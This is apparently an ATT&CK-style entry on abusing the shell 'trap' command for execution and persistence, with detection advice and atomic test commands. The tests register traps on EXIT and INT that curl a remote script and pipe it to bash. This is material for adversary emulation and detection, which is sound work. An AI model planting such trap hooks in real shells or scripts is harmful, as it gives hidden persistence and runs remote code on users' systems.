Thetrapcommand allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts likectrl+candctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following formattrap 'command list' signalswhere "command list" will be executed when "signals" are received.Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.
Platforms: Linux, macOS
Data Sources: File monitoring, Process Monitoring, Process command-line parameters
Permissions Required: User, Administrator
Remote Support: No
After exiting the shell, the script will download and execute.
After sending a keyboard interrupt (CTRL+C) the script will download and execute.
Supported Platforms: macOS, CentOS, Ubuntu, Linux
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT